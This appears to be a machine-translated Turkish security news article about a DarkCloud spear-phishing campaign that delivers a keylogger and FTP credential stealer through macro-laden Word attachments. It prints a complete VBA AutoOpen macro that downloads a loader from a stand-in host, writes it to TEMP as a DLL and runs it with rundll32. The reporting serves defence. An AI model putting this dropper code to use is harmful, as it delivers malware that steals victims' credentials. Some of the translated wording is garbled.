Yeni gözlemlenen bir mızrak aktı kampanyası, dağıtmak için sofistike sosyal mühendislik yemlerinden yararlanıyor Darkcloudtuş vuruşlarını hasat etmek, FTP kimlik bilgilerini eklemek ve sistem bilgilerini toplamak için tasarlanmış modüler bir kötü amaçlı yazılım paketi.
Geçen ay, meşru yazılım güncellemeleri veya kurumsal faturalar olarak maskelenen hedeflenen e -postalar, çeşitli endüstrilerdeki şüpheli olmayan alıcılara ulaşmıştır.
Bu mesajlar, açıldığında çok aşamalı bir enfeksiyon zincirini tetikleyen silahlandırılmış bir Microsoft kelime eki taşır.
İlk keşif, kampanyanın arkasındaki tehdit aktörlerinin, yüksek düzeyde operasyonel güvenlik ve tradecraft gösteren inandırıcı mesajların hazırlanması için büyük çaba harcadığını göstermektedir.
Mağdur belgedeki makroları etkinleştirdikten kısa bir süre sonra, uygulamalar için gizli bir Visual Basic (VBA) komut dosyası yürütülür ve bir sonraki aşama yükü indirmek için bir komut ve kontrol (C2) sunucusuna ulaşır.
.webp)
Bu yük, DarkCloud yükleyici, ek modülleri doğrudan belleğe açabilir, disk tabanlı algılama ve adli analizi karmaşıklaştırabilir.
Analistler, yükleyicinin sanal makine artefaktlarını ve kum havuzu ortamlarını kontrol ettiğini, yürütmeyi geciktirdiğini veya analiz araçlarının algılanması durumunda iptal ettiğini belirtiyor.
Esentir araştırmacıları, Kampanyanın ilk tespitinden sonraki saatler içinde DarkCloud’un temel keyloglama bileşenini belirledi.
Kötü amaçlı yazılımları, bir dinamik bağlantı kütüphanesi enjekte etmeyi gözlemlediler. explorer.exe Ve svchost.exekullanıcı girişini yakalamak için tuş vuruşu API’lerinde kancalar oluşturulması.
Bu yaklaşım, web tabanlı FTP istemcilerine girilen kimlik bilgileri de dahil olmak üzere her yazılan karakterin ele geçirilmesini sağlar.
Toplanan veriler daha sonra özel bir XOR tabanlı algoritma ile şifrelenir ve normal ağ akışlarıyla harmanlanarak meşru HTTPS trafiği kisvesi altında C2 altyapısına gönderilir.
.webp)
Kimlik hırsızlığının yanı sıra DarkCloud, gelişmiş keşif yetenekleri sergiliyor. İşlemler, yüklü yazılımlar ve açık ağ bağlantıları gibi sistem bilgilerini toplar ve bu meta verileri saldırganlara geri aktarır.
Bu zenginleştirme, operatörlerin uzaktan dosya eklentisi veya ekran yakalama bileşeni gibi sonraki modülleri kurbanın ortamına uyarlamasına izin verir.
Kampanya boyunca, tehdit aktörleri adli ayak izlerini en aza indirirken veri toplamayı en üst düzeye çıkarmak için modüller arasında döner.
Enfeksiyon mekanizması ve yükleyici dinamikleri
Enfeksiyon dizisi, şaşkın bir VBA makrou içeren bir cazibe belgesi ile başlar. Aktivasyon üzerine makro aşağıdaki sırayı yürütür:-
Sub AutoOpen()
Dim xmlHttp As Object
Set xmlHttp = CreateObject("MSXML2.XMLHTTP")
xmlHttp.Open "GET", "https://malicious.example.com/loader.bin", False
xmlHttp.send
Dim shell As Object
Set shell = CreateObject("WScript.Shell")
Dim tempPath As String
tempPath = Environ("TEMP") & "\dcl.dll"
With CreateObject("ADODB.Stream")
.Type = 1
.Open
.Write xmlHttp.responseBody
.SaveToFile tempPath, 2
.Close
End With
shell.Run "rundll32.exe " & tempPath & ",EntryPoint"
End SubBir kere dcl.dll yüklenir, bellekte ek modülleri açar. Yükleyici, gömülü yüklerin şifresini çözmek için özel bir “yığın XOR” rutini kullanır ve diskteki yürütülebilir dosyaları bırakmaktan kaçınır.
Bu bellek yerleşik tasarım, DarkCloud’un bir kayıt defteri çalıştırma anahtarı ile kalıcılığı korumasını sağlarken, modüler mimarisi yeni yeteneklerin isteğe bağlı olarak konuşlandırılmasını destekler.
İkna edici bir mızrak aktı vektörünü gizli, bellek içi yükleyici ve modüler eklentilerle birleştirerek, DarkCloud, FTP tabanlı dosya transferlerine ve birleşik uç nokta koruma çözümlerine dayanan kuruluşlar için önemli bir tehdit oluşturur.
Güvenlik ekipleri, bilinmeyen ana bilgisayarlara anormal HTTPS oturumlarını izlemeli ve API kanca enjeksiyonlarını tespit edebilen davranışsal analiz araçlarını kullanmalıdır. Sürekli tehdit istihbarat paylaşımı ve hızlı olay yanıtı, DarkCloud’un gelişen taktiklerini azaltmak için kritik olacaktır.
Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin– CSN’yi Google’da tercih edilen bir kaynak olarak ayarlayın.
